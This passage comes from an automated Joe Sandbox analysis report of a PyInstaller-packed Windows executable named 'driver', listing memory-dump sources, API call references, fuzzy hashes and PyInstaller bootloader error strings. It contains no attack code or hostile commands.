                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                • Instruction ID: fc8b5457179fdd74707a3b8e843e8010869bf4c9dd6420c2b9716348524b74b9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB12C472E4E2438EFB286E16D1142797691FBC0F58F944535E68A876C6DFBCF580AB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                • Instruction ID: 1d78862ce419e4756329445e5822a1960ec0c69b870c19dc54f8a04e6809298d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30129631E4E1438AFB24AA16E1546797261FB40F5CF984035D699C7AC6DFBCFC80AB18
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                • Opcode ID: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                                                • Instruction ID: 30ea5a6e5b2fe94dc229a738652b5487460b866e9d55a4276c9e9f7d089418d8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c31251e6cc82c47abebe2306b4fb6df75d7e9a8de90183b667ac336f21b0774
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B416822B8A65286FA10DB13A8556BA6395FF44FC8F844432ED4C87797DFBCE502A740
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                • Opcode ID: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                                                • Instruction ID: c47f30c867e7c2ae03e0c6b327bd2d2e15bbf5d481107ccdd0e149c83a63f551
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a016122ccacf22d2f40e2f4ad7ae1084c068073363954eaa92016f2cfc1e0a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09417E22B8A6429AFA10DB23D4515B97391EF44F9CF444432ED4D87B97DFBCE542A700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                • Instruction ID: 898370ea11ac07150cb2a6f53b1968cbe6bdf08a93cbc2c7450484af30ae40a9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35D17C32A497418AEB20DB66D4453AD37A4FB45B8CF500136EE8D97B9BDFB8E490D700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2C9E
                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2D63
                                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF6A29B2D99
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                                • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                • Instruction ID: b03ee444e7dfb5ca23af1030333177d7dc886f056d7cf53708ae0acf53684745
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C031C322B49B4142E620AB26A8542AB6695BF88FDDF400136EF4DD375ADF7CD506D300
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDDBD
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDDCB
                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDDF5
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDE63
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6A29BDFEA,?,?,?,00007FF6A29BDCDC,?,?,?,00007FF6A29BD8D9), ref: 00007FF6A29BDE6F
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                • Instruction ID: 6fb9187e514338b17109fd4e8eeedf04451747e1992d089788ffda96768a1d8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3131C225B4BA0281EE129B03A81057523D4FF58FA8F494535DD1D8B787EFBCE444A324
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                                • Instruction ID: aa9a573f4e193643605a188e915c880e9098a14ac765e0c876529104bbaf8b20
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31416531A5EA8791EA11DB22E4552F96351FF44B48F800132EA5DC369BEFBCF605E740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF6A29B351A,?,00000000,00007FF6A29B3F23), ref: 00007FF6A29B2AA0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                                • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                • Instruction ID: 1830cea742d7ff759bdc423e423cafd9551ad5159999ef12c03b485e4b678c7b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E21A332A5A78182E6209B62F4417E66394FB88BC8F400136EE8C9365ADFBCD5459700
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                                • Instruction ID: c20b891bb48f0ce348f93c0f3e3481852e5ce6b0160f645aa80b9a1a8ea36ff4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 79219F20E8F2424AFA68A763966527D61435F64FBCF404734D93EC7ADBDEACB440A301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                • Instruction ID: 39731ba6fb0802c0d1220f5abc0855caa74505b38164f0b7dc7ad03596006346
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37114932A59B4286E7508B53E85432963E1FB98FE8F044234EA5DC77A6DFBCD844A740
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B8592
                                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B85E9
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6A29B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6A29B45E4,00000000,00007FF6A29B1985), ref: 00007FF6A29B9439
                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B8678
                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B86E4
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B86F5
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF6A29B9216), ref: 00007FF6A29B870A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                                • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                                • Instruction ID: 9db512d9e5dc9811b878b40bf45de6b8a1355c29298a3473d900e4f9ea779674
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1341B462B5A68285EA309B13A5406AA6394FF88FCCF440135DF8DD7B8BDEBCE501D701
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB347
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB37D
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3AA
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3BB
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3CC
                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF6A29C4F81,?,?,?,?,00007FF6A29CA4FA,?,?,?,?,00007FF6A29C71FF), ref: 00007FF6A29CB3E7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                                • Instruction ID: 4ff33f96e10842e483defba3b1a6c28c84005d5533e1d23eb5a295cf7448bdda
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B118E20F8F2428AFA58A723966123D61425F54FBCF444335E86EC6BC7DEACB441A301
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6A29B1B6A), ref: 00007FF6A29B295E
                                                                                                                                                                                                                                                Strings
